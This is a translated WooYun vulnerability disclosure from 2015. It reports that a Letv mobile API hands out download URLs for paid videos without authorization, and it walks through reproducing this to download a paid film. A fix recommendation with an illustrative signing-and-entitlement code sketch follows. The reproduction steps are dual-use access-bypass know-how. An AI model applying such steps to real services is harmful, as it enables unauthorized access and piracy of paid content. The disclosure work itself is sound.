
Vulnerability summary

Defect ID: wooyun-2015-0141445

Title: Improper permission settings on a Letv (乐视网) API allow arbitrary download of videos

Vendor: 乐视网 (Letv)

Author: 小Q

Submitted: 2015-09-16 09:06

Fixed: 2015-11-01 09:46

Published: 2015-11-01 09:46

Type: Design flaw / logic error

Severity: High

Self-assessed Rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-16: Details sent to the vendor, awaiting vendor processing
2015-09-17: Vendor confirmed; details disclosed to the vendor only
2015-09-27: Details disclosed to core white hats and relevant domain experts
2015-10-07: Details disclosed to regular white hats
2015-10-17: Details disclosed to intern white hats
2015-11-01: Details disclosed to the public

Brief description:

Improper permission settings on a Letv API allow the download address of any video to be obtained at will

Detailed description:

Take the paid movie《小时代4:灵魂尽头》as an example.

(screenshot: 010.jpg)

From the page address http://www.letv.com/ptv/vplay/23174476.html we get vid=23174476;
the API endpoint http://api.mob.app.letv.com/play?vid=23174476 then returns the resolved stream addresses for every quality level, with no authorization check:

(screenshot: 011.jpg)

Taking the mainurl of MP4_180 as an example:

http:\/\/g3.letv.cn\/vod\/v2\/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile

Note that the "\" characters (JSON string escaping of "/") have to be removed, giving the address

http://g3.letv.cn/vod/v2/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile


Pick an address close to you and be careful to copy the complete address (the last parameter is cips; if that is hard to see, paste it into a JS formatter). Requesting it returns the download address:

(screenshot: 012.jpg)


http:\/\/122.72.111.116\/176\/23\/93\/letv-uts\/14\/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


Again remove the "\" characters to get the address

http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


Put it into Xunlei (Thunder) and download it; the speed is very fast:

(screenshot: 013.jpg)


Play it after the download completes:

(screenshot: 014.jpg)


Note that the addresses change constantly; to reproduce, the resolution has to be done with the address that is current at that time.

Proof of vulnerability:

Taking the paid movie《小时代4:灵魂尽头》as an example,
the address obtained through the API is

http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


Download with Xunlei:

(screenshot: 013.jpg)


Play the video:

(screenshot: 014.jpg)


Fix recommendation:

Put access authorization on the API endpoint http://api.mob.app.letv.com/play?vid= so that stream addresses are only issued to callers entitled to the video
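As an added illustration of that fix (example code written for this page, not Letv's own implementation): a Python sketch of a play handler that authenticates the caller, checks entitlement to the requested vid, and then issues only a short-lived HMAC-signed stream URL that the edge re-verifies, so a link that does leak stops working after its TTL. The entitlement table, signing key, TTL and CDN host are constructed placeholders, and the signing scheme is hypothetical.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed entitlement table (hypothetical; stands in for a purchase lookup).
# A paid vid must be listed for the caller before any stream URL is issued.
ENTITLEMENTS = {
    "user-alice": {"23174476"},   # has bought the movie
    "user-bob": set(),            # has not
}
SIGNING_KEY = b"server-side-secret-placeholder"   # constructed; never sent to clients
URL_TTL_SECONDS = 300

def sign_stream_url(base_url, vid, now=None):
    """Issue a short-lived URL whose vid and expiry are bound together by an HMAC."""
    now = int(time.time()) if now is None else now
    expires = now + URL_TTL_SECONDS
    sig = hmac.new(SIGNING_KEY, f"{vid}:{expires}".encode(), hashlib.sha256).hexdigest()
    return f"{base_url}?{urlencode({'vid': vid, 'expires': expires, 'sig': sig})}"

def verify_stream_url(url, now=None):
    """Edge/CDN-side check: recompute the HMAC over (vid, expiry) and enforce the
    TTL, so a forwarded or tampered link is refused."""
    now = int(time.time()) if now is None else now
    q = parse_qs(urlsplit(url).query)
    try:
        vid = q["vid"][0]
        expires = int(q["expires"][0])
        sig = q["sig"][0]
    except (KeyError, ValueError):
        return False
    if now > expires:
        return False
    expected = hmac.new(SIGNING_KEY, f"{vid}:{expires}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)

def play(vid, user_id, now=None):
    """Handler for play?vid=...: authenticate, check entitlement, then sign.
    Returns (HTTP status, JSON-like body)."""
    if user_id is None:
        return 401, {"error": "authentication required"}
    if vid not in ENTITLEMENTS.get(user_id, set()):
        return 403, {"error": "caller is not entitled to this video"}
    return 200, {"mainurl": sign_stream_url("http://cdn.example.invalid/vod", vid, now)}
```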

Copyright notice: when reposting, please credit the source 小Q@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-09-17 09:45

Vendor reply:

Thanks for the submission; we are in contact with development and a fix is in progress.

Latest status:

None yet